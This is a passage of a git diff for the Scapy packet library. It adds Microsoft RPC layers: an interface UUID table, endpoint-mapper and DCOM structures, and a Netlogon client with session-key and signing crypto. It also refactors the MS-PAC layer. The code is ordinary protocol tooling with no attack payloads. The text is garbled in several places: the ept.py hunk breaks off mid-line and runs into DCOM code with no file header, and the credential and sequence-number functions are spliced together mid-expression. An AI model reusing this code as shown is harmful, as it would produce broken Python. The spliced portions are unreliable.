"IFsrmPropertyDefinitionValue"), + (uuid.UUID("ea0a3165-4834-11d2-a6f8-00c04fa346cc"), "fax"), + (uuid.UUID("eafe4895-a929-41ea-b14d-613e23f62b71"), "IAppHostPropertyException"), + (uuid.UUID("ed35f7a1-5024-4e7b-a44d-07ddaf4b524d"), "IAppHostProperty"), + (uuid.UUID("ed8bfe40-a60b-42ea-9652-817dfcfa23ec"), "IWindowsDriverUpdateEntry"), + (uuid.UUID("ede0150f-e9a3-419c-877c-01fe5d24c5d3"), "IFsrmPropertyDefinition"), + (uuid.UUID("ee2d5ded-6236-4169-931d-b9778ce03dc6"), "IVdsVolumeMF"), + ( + uuid.UUID("ee321ecb-d95e-48e9-907c-c7685a013235"), + "IFsrmFileManagementJobManager", + ), + (uuid.UUID("ef13d885-642c-4709-99ec-b89561c6bc69"), "IAppHostElementSchema"), + (uuid.UUID("eff90582-2ddc-480f-a06d-60f3fbc362c3"), "IStringCollection"), + (uuid.UUID("f131ea3e-b7be-480e-a60d-51cb2785779e"), "IExport2"), + (uuid.UUID("f1e9c5b2-f59b-11d2-b362-00105a1f8177"), "IWbemRemoteRefresher"), + (uuid.UUID("f309ad18-d86a-11d0-a075-00c04fb68820"), "IWbemLevel1Login"), + (uuid.UUID("f31931a9-832d-481c-9503-887a0e6a79f0"), "IWRMProtocol"), + (uuid.UUID("f3637e80-5b22-4a2b-a637-bbb642b41cfc"), "IFsrmFileScreenBase"), + (uuid.UUID("f411d4fd-14be-4260-8c40-03b7c95e608a"), "IFsrmSetting"), + (uuid.UUID("f4a07d63-2e25-11d1-9964-00c04fbbb345"), "IEnumEventObject"), + (uuid.UUID("f5cc59b4-4264-101a-8c59-08002b2f8426"), "frsrpc"), + (uuid.UUID("f5cc5a18-4264-101a-8c59-08002b2f8426"), "nspi"), + (uuid.UUID("f612954d-3b0b-4c56-9563-227b7be624b4"), "IMSAdminBase3W"), + (uuid.UUID("f6beaff7-1e19-4fbb-9f8f-b89e2018337c"), "IEventService"), + (uuid.UUID("f76fbf3b-8ddd-4b42-b05a-cb1c3ff1fee8"), "IFsrmCollection"), + (uuid.UUID("f82e5729-6aba-4740-bfc7-c7f58f75fb7b"), "IFsrmAutoApplyQuota"), + (uuid.UUID("f89ac270-d4eb-11d1-b682-00805fc79216"), "IEventObjectCollection"), + (uuid.UUID("fa7660f6-7b3f-4237-a8bf-ed0ad0dcbbd9"), "IAppHostWritableAdminManager"), + (uuid.UUID("fa7df749-66e7-4986-a27f-e2f04ae53772"), "IVssSnapshotMgmt"), + (uuid.UUID("fb2b72a0-7a68-11d1-88f9-0080c7d771bf"), "IEventClass"), + (uuid.UUID("fb2b72a1-7a68-11d1-88f9-0080c7d771bf"), "IEventClass2"), + (uuid.UUID("fbc1d17d-c498-43a0-81af-423ddd530af6"), "IEventSubscription3"), + (uuid.UUID("fc5d23e8-a88b-41a5-8de0-2d2f73c5a630"), "IVdsServiceSAN"), + (uuid.UUID("fc910418-55ca-45ef-b264-83d4ce7d30e0"), "IWRMRemoteSessionMgmt"), + (uuid.UUID("fdb3a030-065f-11d1-bb9b-00a024ea5525"), "qmcomm"), + (uuid.UUID("ff4fa04e-5a94-4bda-a3a0-d5b4d3c52eba"), "IFsrmFileScreenManager"), +] + +for uid, name in _DCE_RPC_WELL_KNOWN_UUIDS: + DCE_RPC_INTERFACES_NAMES[uid] = name + DCE_RPC_INTERFACES_NAMES_rev[name.lower()] = uid diff --git a/scapy/layers/msrpce/ept.py b/scapy/layers/msrpce/ept.py new file mode 100644 index 00000000000..d024e2c336a --- /dev/null +++ b/scapy/layers/msrpce/ept.py @@ -0,0 +1,219 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +EPT map (EndPoinT mapper) +""" + +import uuid + +from scapy.config import conf +from scapy.fields import ( + ByteEnumField, + ConditionalField, + FieldLenField, + IPField, + LEShortField, + MultipleTypeField, + PacketListField, + ShortField, + StrLenField, + UUIDEnumField, +) +from scapy.packet import Packet +from scapy.layers.dcerpc import ( + DCE_RPC_INTERFACES_NAMES, + DCE_RPC_INTERFACES_NAMES_rev, + DCE_RPC_TRANSFER_SYNTAXES, +) + +from scapy.layers.msrpce.raw.ept import * # noqa: F401, F403 + + +# [C706] Appendix L + +# "For historical reasons, this cannot be done using the standard +# NDR encoding rules for marshalling and unmarshalling. +# A special encoding is required." - Appendix L + + +class octet_string_t(Packet): + fields_desc = [ + FieldLenField("count", None, fmt="= len(pclsid): + return + next_uid = _uid_from_bytes(pclsid[i], ndrendian=ndrendian) + # [MS-DCOM] 1.9 + cls = { + CLSID_ActivationContextInfo: ActivationContextInfoData, + CLSID_InstanceInfo: InstanceInfoData, + CLSID_InstantiationInfo: InstantiationInfoData, + CLSID_PropsOutInfo: PropsOutInfo, + CLSID_ScmReplyInfo: ScmReplyInfoData, + CLSID_ScmRequestInfo: ScmRequestInfoData, + CLSID_SecurityInfo: SecurityInfoData, + CLSID_ServerLocationInfo: LocationInfoData, + CLSID_SpecialSystemProperties: SpecialPropertiesData, + }[next_uid] + return lambda x: ndr_deserialize1(x, cls, ndr64=False) + + +class ActivationPropertiesBlob(Packet): + fields_desc = [ + LEIntField("dwSize", 0), + LEIntField("dwReserved", 0), + NDRSerializeType1PacketField("CustomHeader", CustomHeader(), CustomHeader), + _ActivationPropertiesField("Property", []), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +# [MS-DCOM] 2.2.18 + + +class OBJREF(Packet): + fields_desc = [ + XStrFixedLenField("signature", b"MEOW", length=4), # :3 + LEIntField("flags", 0x04), + XStrFixedLenField("iid", IID_IActivationPropertiesIn, length=16), + ] + + +# [MS-DCOM] 2.2.18.6 + + +class OBJREF_CUSTOM(Packet): + fields_desc = [ + UUIDField("clsid", CLSID_ActivationPropertiesIn), + LEIntField("cbExtension", 0), + LEIntField("reserved", 0), + PacketField( + "pObjectData", ActivationPropertiesBlob(), ActivationPropertiesBlob + ), + ] + + +# [MS-DCOM] 2.2.19.3 + + +class STRINGBINDING(Packet): + fields_desc = [ + LEShortField("wTowerId", 0), + StrNullFieldUtf16("aNetworkAddr", ""), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +# [MS-DCOM] 2.2.19.4 + + +class SECURITYBINDING(Packet): + fields_desc = [ + LEShortEnumField("wAuthnSvc", 0, RPC_C_AUTHN), + ConditionalField(XShortField("Reserved", 0xffff), lambda pkt: pkt.wAuthnSvc), + ConditionalField( + StrNullFieldUtf16("aPrincName", ""), lambda pkt: pkt.wAuthnSvc + ), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +bind_layers(OBJREF, OBJREF_CUSTOM, flags=4) + + +class DCOM_Client(DCERPC_Client): + """ + A wrapper of DCERPC_Client that adds functions to use DCOM interfaces + """ + + def __init__(self, verb=True, **kwargs): + kwargs.setdefault("port", 135) + super(DCOM_Client, self).__init__( + DCERPC_Transport.NCACN_IP_TCP, ndr64=False, verb=verb, **kwargs + ) + + def ServerAlive2(self): + """ + Call ServerAlive2 and print the results + """ + resp = self.sr1_req(ServerAlive2_Request(ndr64=False)) + binds, secs = _parseStringArray(resp.ppdsaOrBindings.value) + print("Addresses:") + for b in binds: + if b.wTowerId == 0: + continue + print("- %s" % b.aNetworkAddr) + print("Supported RPC Security Providers:") + for b in secs: + print("- %s%s" % ( + b.sprintf("%wAuthnSvc%"), + b.aPrincName and "%s/" % b.aPrincName or "", + )) diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py new file mode 100644 index 00000000000..b02c13e98bd --- /dev/null +++ b/scapy/layers/msrpce/msnrpc.py @@ -0,0 +1,445 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +[MS-NRPC] Netlogon Remote Protocol + +https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f +""" + +import os +import struct +import time + +from scapy.config import conf, crypto_validator +from scapy.layers.dcerpc import ( + find_dcerpc_interface, + DCE_C_AUTHN_LEVEL, + NL_AUTH_MESSAGE, + NL_AUTH_SIGNATURE, +) +from scapy.layers.gssapi import GSS_S_COMPLETE +from scapy.layers.ntlm import RC4, RC4K, RC4Init, SSP + +from scapy.layers.msrpce.rpcclient import DCERPC_Client, DCERPC_Transport +from scapy.layers.msrpce.raw.ms_nrpc import ( + NetrServerAuthenticate3_Request, + NetrServerAuthenticate3_Response, + NetrServerReqChallenge_Request, + NetrServerReqChallenge_Response, + NETLOGON_SECURE_CHANNEL_TYPE, + PNETLOGON_AUTHENTICATOR, + PNETLOGON_CREDENTIAL, +) + + +if conf.crypto_valid: + from cryptography.hazmat.primitives import hashes, hmac + from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes + from scapy.libs.rfc3961 import DES +else: + hashes = hmac = Cipher = algorithms = modes = DES = None + + +# --- RFC + + +# [MS-NRPC] sect 3.1.4.3.1 +@crypto_validator +def ComputeSessionKeyAES(NTOWFv1Hash, ClientChallenge, ServerChallenge): + M4SS = NTOWFv1Hash + h = hmac.HMAC(M4SS, hashes.SHA256()) + h.update(ClientChallenge) + h.update(ServerChallenge) + return h.finalize()[:16] + + +# [MS-NRPC] sect 3.1.4.3.2 +@crypto_validator +def ComputeSessionKeyStrongKey(NTOWFv1Hash, ClientChallenge, ServerChallenge): + M4SS = NTOWFv1Hash + digest = hashes.Hash(hashes.MD5()) + digest.update(b"\x00\x00\x00\x00") + digest.update(ClientChallenge) + digest.update(ServerChallenge) + h = hmac.HMAC(M4SS, hashes.MD5()) + h.update(digest.finalize()) + return h.finalize() + + +# [MS-NRPC] sect 3.1.4.4.1 +@crypto_validator +def ComputeNetlogonCredentialAES(Input, Sk): + cipher = Cipher(algorithms.AES(Sk), mode=modes.CFB(b"\x00" * 16)) + encryptor = cipher.encryptor() + return encryptor.update(Input) + encryptor.finalize() + + +# [MS-NRPC] sect 3.1.4.4.2 +def InitLMKey(KeyIn): + KeyOut = bytearray(b"\x00" * 8) + KeyOut[0] = KeyIn[0] >> 0x01 + KeyOut[1] = ((KeyIn[0] & 0x01) << 6) | (KeyIn[1] >> 2) + KeyOut[2] = ((KeyIn[1] & 0x03) << 5) | (KeyIn[2] >> 3) + KeyOut[3] = ((KeyIn[2] & 0x07) << 4) | (KeyIn[3] >> 4) + KeyOut[4] = ((KeyIn[3] & 0x0F) << 3) | (KeyIn[4] >> 5) + KeyOut[5] = ((KeyIn[4] & 0x1F) << 2) | (KeyIn[5] >> 6) + KeyOut[6] = ((KeyIn[5] & 0x3F) << 1) | (KeyIn[6] >> 7) + KeyOut[7] = KeyIn[6] & 0x7F + for i in range(8): + KeyOut[i] = (KeyOut[i] << 1) & 0xFE + return KeyOut + + +@crypto_validator +def ComputeNetlogonCredentialDES(Input, Sk): + k3 = InitLMKey(Sk[0:7]) + k4 = InitLMKey(Sk[7:14]) + output1 = Cipher(DES(k3), modes.ECB()).encryptor().update(Input) + return Cipher(DES(k4), modes.ECB()).encryptor().update(output1) + + +# [MS-NRPC] sect 3.1.4.5 +def _credentialAddition(cred, i): + return ( + struct.pack( + "L", ClientSequenceNumber & 0xFFFFFFFF) + high = struct.pack( + ">L", + ((ClientSequenceNumber >> 32) & 0xFFFFFFFF) | (0x80000000 if client else 0), + ) + return low + high + + +@crypto_validator +def ComputeNetlogonSignature(nl_auth_sig, message, SessionKey, Confounder=None): + digest = hashes.Hash(hashes.MD5()) + digest.update(b"\x00\x00\x00\x00") + digest.update(nl_auth_sig[:8]) + if Confounder: + digest.update(Confounder) + digest.update(message) + h = hmac.HMAC(SessionKey, hashes.MD5()) + h.update(digest.finalize()) + return h.finalize() + + +@crypto_validator +def ComputeNetlogonSealingKey(SessionKey, CopySeqNumber): + XorKey = bytes(bytearray((x ^ 0xF0) for x in bytearray(SessionKey))) + h = hmac.HMAC(XorKey, hashes.MD5()) + h.update(b"\x00\x00\x00\x00") + h = hmac.HMAC(h.finalize(), hashes.MD5()) + h.update(CopySeqNumber) + return h.finalize() + + +@crypto_validator +def ComputeNetlogonSequenceNumberKey(SessionKey, Checksum): + h = hmac.HMAC(SessionKey, hashes.MD5()) + h.update(b"\x00\x00\x00\x00") + h = hmac.HMAC(h.finalize(), hashes.MD5()) + h.update(Checksum) + return h.finalize() + + +# --- SSP + + +class NetlogonSSP(SSP): + auth_type = 0x44 # Netlogon + dcerpc_header_signing = False + + class CONTEXT(SSP.CONTEXT): + __slots__ = ["ClientSequenceNumber", "IsClient"] + + def __init__(self, IsClient): + self.IsClient = IsClient + self.ClientSequenceNumber = 0 + + def __init__(self, SessionKey, computername, domainname, **kwargs): + self.SessionKey = SessionKey + self.computername = computername + self.domainname = domainname + super(NetlogonSSP, self).__init__(**kwargs) + + def _secure(self, Context, msgs, Seal): + """ + Internal function used by GSS_WrapEx and GSS_GetMICEx + """ + # Concatenate the ToSign + ToSign = b"".join(x.data for x in msgs if x.sign) + + # [MS-NRPC] 3.3.4.2.1, AES not negotiated + signature = NL_AUTH_SIGNATURE( + SignatureAlgorithm=0x0077, + SealAlgorithm=0x007A if Seal else 0xFFFF, + ) + Confounder = None + if Seal: + Confounder = os.urandom(8) + SequenceNumber = ComputeCopySeqNumber( + Context.ClientSequenceNumber, Context.IsClient + ) + Context.ClientSequenceNumber += 1 + signature.Checksum = ComputeNetlogonSignature( + bytes(signature), ToSign, self.SessionKey, Confounder + )[:8] + if Seal: + # 3.3.4.2.1 pt 8 + EncryptionKey = ComputeNetlogonSealingKey(self.SessionKey, SequenceNumber) + # Encrypt Confounder and data + handle = RC4Init(EncryptionKey) + signature.Confounder = RC4(handle, Confounder) + # DOC IS WRONG ! + # > The server MUST initialize RC4 only once, before encrypting + # > the Confounder field. + # But, this fails ! as Samba put it: + # > For RC4, Windows resets the cipherstate after encrypting + # > the confounder, thus defeating the purpose of the confounder + handle = RC4Init(EncryptionKey) + for msg in msgs: + if msg.conf_req_flag: + msg.data = RC4(handle, msg.data) + # 3.3.4.2.1 pt 9 + EncryptionKey = ComputeNetlogonSequenceNumberKey( + self.SessionKey, signature.Checksum + ) + signature.SequenceNumber = RC4K(EncryptionKey, SequenceNumber) + + return ( + msgs, + signature, + ) + + def _unsecure(self, Context, msgs, signature, Seal): + """ + Internal function used by GSS_UnwrapEx and GSS_VerifyMICEx + """ + assert isinstance(signature, NL_AUTH_SIGNATURE) + + # [MS-NRPC] sect 3.3.4.2.2 AES not negotiated + # 3.3.4.2.2 pt 5 + EncryptionKey = ComputeNetlogonSequenceNumberKey( + self.SessionKey, signature.Checksum + ) + SequenceNumber = RC4K(EncryptionKey, signature.SequenceNumber) + # 3.3.4.2.2 pt 6/7 + CopySeqNumber = ComputeCopySeqNumber( + Context.ClientSequenceNumber, not Context.IsClient + ) + Context.ClientSequenceNumber += 1 + if SequenceNumber != CopySeqNumber: + raise ValueError("ERROR: SequenceNumber don't match") + Confounder = None + if Seal: + # 3.3.4.2.2 pt 9 + EncryptionKey = ComputeNetlogonSealingKey(self.SessionKey, SequenceNumber) + Confounder = RC4K(EncryptionKey, signature.Confounder) + for msg in msgs: + if msg.conf_req_flag: + msg.data = RC4K(EncryptionKey, msg.data) + + # Concatenate the ToSign + ToSign = b"".join(x.data for x in msgs if x.sign) + + # 3.3.4.2.2 pt 10/11 + Checksum = ComputeNetlogonSignature( + bytes(signature), ToSign, self.SessionKey, Confounder + )[:8] + if signature.Checksum != Checksum: + raise ValueError("ERROR: Checksum don't match") + return msgs + + def GSS_WrapEx(self, Context, msgs, qop_req=0): + return self._secure(Context, msgs, True) + + def GSS_GetMICEx(self, Context, msgs, qop_req=0): + return self._secure(Context, msgs, False)[1] + + def GSS_UnwrapEx(self, Context, msgs, signature): + return self._unsecure(Context, msgs, signature, True) + + def GSS_VerifyMICEx(self, Context, msgs, signature): + self._unsecure(Context, msgs, signature, False) + + def GSS_Init_sec_context(self, Context, val=None): + if Context is None: + Context = self.CONTEXT(True) + + return ( + Context, + NL_AUTH_MESSAGE( + MessageType=0, + Flags=3, + NetbiosDomainName=self.domainname, + NetbiosComputerName=self.computername, + ), + GSS_S_COMPLETE, + ) + + def GSS_Accept_sec_context(self, Context, val=None): + if Context is None: + Context = self.CONTEXT(False) + + return ( + Context, + NL_AUTH_MESSAGE( + MessageType=1, + Flags=0, + ), + GSS_S_COMPLETE, + ) + + +# --- Utils + + +class NetlogonClient(DCERPC_Client): + def __init__( + self, + auth_level=DCE_C_AUTHN_LEVEL.NONE, + domainname=None, + computername=None, + verb=True, + ): + self.interface = find_dcerpc_interface("logon") + self.ndr64 = False # Netlogon doesn't work with NDR64 + self.SessionKey = None + self.auth_level = auth_level + self.domainname = domainname + self.computername = computername + self.ClientStoredCredential = None + super(NetlogonClient, self).__init__( + DCERPC_Transport.NCACN_IP_TCP, + ndr64=self.ndr64, + verb=verb, + ) + + def connect_and_bind(self, remoteIP): + super(NetlogonClient, self).connect_and_bind(remoteIP, self.interface) + + def alter_context(self): + return super(NetlogonClient, self).alter_context(self.interface) + + def create_authenticator(self): + auth, self.ClientStoredCredential = NewAuthenticatorAndCredential( + self.ClientStoredCredential, self.SessionKey + ) + return auth + + def validate_authenticator(self, auth): + self.ClientStoredCredential = _credentialAddition( + self.ClientStoredCredential, 1 + ) + tempcred = ComputeNetlogonCredentialDES( + self.ClientStoredCredential, self.SessionKey + ) + assert ( + tempcred == auth.Credential.data + ), "Server netlogon authenticator is wrong !" + + def setSessionKey(self, SessionKey): + self.SessionKey = SessionKey + self.ssp = self.sock.session.ssp = NetlogonSSP( + SessionKey=self.SessionKey, + auth_level=self.auth_level, + domainname=self.domainname, + computername=self.computername, + ) + + def negotiate_sessionkey(self, secretHash): + # Flow documented in 3.1.4 Session-Key Negotiation + # and sect 3.4.5.2 for specific calls + clientChall = b"12345678" + # Step 1: NetrServerReqChallenge + netr_server_req_chall_response = self.sr1_req( + NetrServerReqChallenge_Request( + PrimaryName=None, + ComputerName=self.computername, + ClientChallenge=PNETLOGON_CREDENTIAL( + data=clientChall, + ), + ndr64=self.ndr64, + ndrendian=self.ndrendian, + ) + ) + if ( + NetrServerReqChallenge_Response not in netr_server_req_chall_response + or netr_server_req_chall_response.status != 0 + ): + print(conf.color_theme.fail("! Failure.")) + netr_server_req_chall_response.show() + return False + # Step 2: NetrServerAuthenticate3 + serverChall = netr_server_req_chall_response.ServerChallenge.data + SessionKey = ComputeSessionKeyStrongKey(secretHash, clientChall, serverChall) + self.ClientStoredCredential = ComputeNetlogonCredentialDES( + clientChall, SessionKey + ) + netr_server_auth3_response = self.sr1_req( + NetrServerAuthenticate3_Request( + PrimaryName=None, + AccountName=self.computername + "$", + SecureChannelType=NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, + ComputerName=self.computername, + ClientCredential=PNETLOGON_CREDENTIAL( + data=self.ClientStoredCredential, + ), + NegotiateFlags=0x600FFFFF, + ndr64=self.ndr64, + ndrendian=self.ndrendian, + ) + ) + if ( + NetrServerAuthenticate3_Response not in netr_server_auth3_response + or netr_server_auth3_response.status != 0 + ): + if netr_server_auth3_response.status == 0xC0000022: + print(conf.color_theme.fail("! STATUS_ACCESS_DENIED")) + elif netr_server_auth3_response.status == 0xC000018B: + print(conf.color_theme.fail("! STATUS_NO_TRUST_SAM_ACCOUNT")) + else: + print(conf.color_theme.fail("! Failure.")) + netr_server_auth3_response.show() + return False + # Check Server Credential + if ( + netr_server_auth3_response.ServerCredential.data + != ComputeNetlogonCredentialDES(serverChall, SessionKey) + ): + print(conf.color_theme.fail("! Invalid ServerCredential.")) + return False + # SessionKey negotiated ! + self.setSessionKey(SessionKey) + return True diff --git a/scapy/layers/mspac.py b/scapy/layers/msrpce/mspac.py similarity index 66% rename from scapy/layers/mspac.py rename to scapy/layers/msrpce/mspac.py index 07bf93c50d2..64608f919eb 100644 --- a/scapy/layers/mspac.py +++ b/scapy/layers/msrpce/mspac.py @@ -1,12 +1,13 @@ # SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy # See https://scapy.net/ for more information -# Copyright (C) Gabriel Potter +# Copyright (C) Gabriel Potter """ [MS-PAC] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/166d8064-c863-41e1-9c23-edaaa5f36962 +Up to date with version: 23.0 """ import struct @@ -23,7 +24,7 @@ LEIntField, LEShortField, MultipleTypeField, - PacketLenField, + PacketField, PacketListField, StrField, StrFieldUtf16, @@ -34,17 +35,19 @@ XStrLenField, ) from scapy.packet import Packet -from scapy.layers.kerberos import _AUTHORIZATIONDATA_VALUES +from scapy.layers.kerberos import ( + _AUTHORIZATIONDATA_VALUES, + _KRB_S_TYPES, +) from scapy.layers.dcerpc import ( - _NDRConfField, NDRByteField, + NDRConfFieldListField, + NDRConfPacketListField, NDRConfStrLenField, - NDRConfVarStrLenField, NDRConfVarStrLenFieldUtf16, - NDRConfPacketListField, - NDRConfFieldListField, NDRConfVarStrNullFieldUtf16, NDRConformantString, + NDRFieldListField, NDRFullPointerField, NDRInt3264EnumField, NDRIntField, @@ -52,17 +55,19 @@ NDRPacket, NDRPacketField, NDRSerialization1Header, + NDRSerializeType1PacketLenField, NDRShortField, NDRSignedLongField, NDRUnionField, + _NDRConfField, ndr_deserialize1, ndr_serialize1, ) from scapy.layers.ntlm import ( _NTLMPayloadField, _NTLMPayloadPacket, - _NTLM_post_build, ) +from scapy.layers.smb2 import WINNT_SID # sect 2.4 @@ -75,17 +80,18 @@ class PAC_INFO_BUFFER(Packet): { 0x00000001: "Logon information", 0x00000002: "Credentials information", - 0x00000006: "Server checksum", - 0x00000007: "KDC checksum", + 0x00000006: "Server Signature", + 0x00000007: "KDC Signature", 0x0000000A: "Client name and ticket information", 0x0000000B: "Constrained delegation information", 0x0000000C: "UPN and DNS information", 0x0000000D: "Client claims information", 0x0000000E: "Device information", 0x0000000F: "Device claims information", - 0x00000010: "Ticket checksum", + 0x00000010: "Ticket Signature", 0x00000011: "PAC Attributes", 0x00000012: "PAC Requestor", + 0x00000013: "Extended KDC Signature", }, ), LEIntField("cbBufferSize", None), @@ -98,17 +104,23 @@ def default_payload_class(self, payload): _PACTYPES = {} -# sect 2.5 - NDR PACKETS AUTO-GENERATED + +# sect 2.5 - NDR PACKETS class RPC_UNICODE_STRING(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRShortField("Length", 0), - NDRShortField("MaximumLength", 0), + NDRShortField("Length", None, size_of="Buffer", adjust=lambda _, x: (x * 2)), + NDRShortField( + "MaximumLength", None, size_of="Buffer", adjust=lambda _, x: (x * 2) + ), NDRFullPointerField( NDRConfVarStrLenFieldUtf16( - "Buffer", "", length_from=lambda pkt: (pkt.Length // 2) + "Buffer", + "", + size_is=lambda pkt: (pkt.MaximumLength // 2), + length_is=lambda pkt: (pkt.Length // 2), ), deferred=True, ), @@ -120,7 +132,7 @@ class FILETIME(NDRPacket): fields_desc = [NDRIntField("dwLowDateTime", 0), NDRIntField("dwHighDateTime", 0)] -class PGROUP_MEMBERSHIP(NDRPacket): +class GROUP_MEMBERSHIP(NDRPacket): ALIGNMENT = (4, 4) fields_desc = [NDRIntField("RelativeId", 0), NDRIntField("Attributes", 0)] @@ -137,12 +149,12 @@ class RPC_SID_IDENTIFIER_AUTHORITY(NDRPacket): fields_desc = [StrFixedLenField("Value", "", length=6)] -class PSID(NDRPacket): +class SID(NDRPacket): ALIGNMENT = (4, 8) - CONFORMANT_COUNT = 1 + DEPORTED_CONFORMANTS = ["SubAuthority"] fields_desc = [ NDRByteField("Revision", 0), - NDRByteField("SubAuthorityCount", 0), + NDRByteField("SubAuthorityCount", None, size_of="SubAuthority"), NDRPacketField( "IdentifierAuthority", RPC_SID_IDENTIFIER_AUTHORITY(), @@ -152,16 +164,19 @@ class PSID(NDRPacket): "SubAuthority", [], NDRIntField("", 0), - count_from=lambda pkt: pkt.SubAuthorityCount, + size_is=lambda pkt: pkt.SubAuthorityCount, conformant_in_struct=True, ), ] + def summary(self): + return WINNT_SID.summary(self) -class PKERB_SID_AND_ATTRIBUTES(NDRPacket): + +class KERB_SID_AND_ATTRIBUTES(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRFullPointerField(NDRPacketField("Sid", PSID(), PSID), deferred=True), + NDRFullPointerField(NDRPacketField("Sid", SID(), SID), deferred=True), NDRIntField("Attributes", 0), ] @@ -185,13 +200,13 @@ class KERB_VALIDATION_INFO(NDRPacket): NDRShortField("BadPasswordCount", 0), NDRIntField("UserId", 0), NDRIntField("PrimaryGroupId", 0), - NDRIntField("GroupCount", 0), + NDRIntField("GroupCount", None, size_of="GroupIds"), NDRFullPointerField( NDRConfPacketListField( "GroupIds", - [PGROUP_MEMBERSHIP()], - PGROUP_MEMBERSHIP, - count_from=lambda pkt: pkt.GroupCount, + [GROUP_MEMBERSHIP()], + GROUP_MEMBERSHIP, + size_is=lambda pkt: pkt.GroupCount, ), deferred=True, ), @@ -199,45 +214,37 @@ class KERB_VALIDATION_INFO(NDRPacket): NDRPacketField("UserSessionKey", USER_SESSION_KEY(), USER_SESSION_KEY), NDRPacketField("LogonServer", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), NDRPacketField("LogonDomainName", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), - NDRFullPointerField( - NDRPacketField("LogonDomainId", PSID(), PSID), deferred=True - ), - FieldListField("Reserved1", [], NDRIntField("", 0), count_from=lambda _: 2), + NDRFullPointerField(NDRPacketField("LogonDomainId", SID(), SID), deferred=True), + NDRFieldListField("Reserved1", [], NDRIntField("", 0), length_is=lambda _: 2), NDRIntField("UserAccountControl", 0), - FieldListField("Reserved3", [], NDRIntField("", 0), count_from=lambda _: 7), - NDRIntField("SidCount", 0), + NDRFieldListField("Reserved3", [], NDRIntField("", 0), length_is=lambda _: 7), + NDRIntField("SidCount", None, size_of="ExtraSids"), NDRFullPointerField( NDRConfPacketListField( "ExtraSids", - [PKERB_SID_AND_ATTRIBUTES()], - PKERB_SID_AND_ATTRIBUTES, - count_from=lambda pkt: pkt.SidCount, + [KERB_SID_AND_ATTRIBUTES()], + KERB_SID_AND_ATTRIBUTES, + size_is=lambda pkt: pkt.SidCount, ), deferred=True, ), NDRFullPointerField( - NDRPacketField("ResourceGroupDomainSid", PSID(), PSID), deferred=True + NDRPacketField("ResourceGroupDomainSid", SID(), SID), deferred=True ), - NDRIntField("ResourceGroupCount", 0), + NDRIntField("ResourceGroupCount", None, size_of="ResourceGroupIds"), NDRFullPointerField( NDRConfPacketListField( "ResourceGroupIds", - [PGROUP_MEMBERSHIP()], - PGROUP_MEMBERSHIP, - count_from=lambda pkt: pkt.ResourceGroupCount, + [GROUP_MEMBERSHIP()], + GROUP_MEMBERSHIP, + size_is=lambda pkt: pkt.ResourceGroupCount, ), deferred=True, ), ] -class KERB_VALIDATION_INFO_WRAP(NDRPacket): - # Extra packing class to handle all deferred pointers - # (usually, this would be the packing RPC request/response) - fields_desc = [NDRPacketField("data", None, KERB_VALIDATION_INFO)] - - -_PACTYPES[1] = KERB_VALIDATION_INFO_WRAP +_PACTYPES[1] = KERB_VALIDATION_INFO # sect 2.6 @@ -267,7 +274,9 @@ class PAC_CREDENTIAL_INFO(Packet): class PAC_CLIENT_INFO(Packet): fields_desc = [ - UTCTimeField("ClientId", None, fmt=" bytes + offset = 12 + fields = { + "Upn": 0, + "DnsDomainName": 4, + } + if self.Flags.S: + offset = 20 + fields["SamName"] = 12 + fields["Sid"] = 16 return ( - _NTLM_post_build( + _pac_post_build( self, pkt, - self.OFFSET, - { - "Upn": 0, - "DnsDomainName": 4, - }, - ) + - pay + offset, + fields, + ) + + pay ) _PACTYPES[0xC] = UPN_DNS_INFO -# sect 2.11 - NDR PACKETS AUTO-GENERATED +# sect 2.11 - NDR PACKETS try: from enum import IntEnum @@ -418,39 +466,39 @@ class CLAIMS_COMPRESSION_FORMAT(IntEnum): COMPRESSION_FORMAT_XPRESS_HUFF = 4 -class u_sub0(NDRPacket): +class CLAIM_ENTRY_sub0(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRIntField("ValueCount", 0), + NDRIntField("ValueCount", None, size_of="Int64Values"), NDRFullPointerField( NDRConfFieldListField( "Int64Values", [], NDRSignedLongField, - count_from=lambda pkt: pkt.ValueCount, + size_is=lambda pkt: pkt.ValueCount, ), deferred=True, ), ] -class u_sub1(NDRPacket): +class CLAIM_ENTRY_sub1(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRIntField("ValueCount", 0), + NDRIntField("ValueCount", None, size_of="Uint64Values"), NDRFullPointerField( NDRConfFieldListField( - "Uint64Values", [], NDRLongField, count_from=lambda pkt: pkt.ValueCount + "Uint64Values", [], NDRLongField, size_is=lambda pkt: pkt.ValueCount ), deferred=True, ), ] -class u_sub2(NDRPacket): +class CLAIM_ENTRY_sub2(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRIntField("ValueCount", 0), + NDRIntField("ValueCount", None, size_of="StringValues"), NDRFullPointerField( NDRConfFieldListField( "StringValues", @@ -459,20 +507,20 @@ class u_sub2(NDRPacket): NDRConfVarStrNullFieldUtf16("StringVal", ""), deferred=True, ), - count_from=lambda pkt: pkt.ValueCount, + size_is=lambda pkt: pkt.ValueCount, ), deferred=True, ), ] -class u_sub3(NDRPacket): +class CLAIM_ENTRY_sub3(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRIntField("ValueCount", 0), + NDRIntField("ValueCount", None, size_of="BooleanValues"), NDRFullPointerField( NDRConfFieldListField( - "BooleanValues", [], NDRLongField, count_from=lambda pkt: 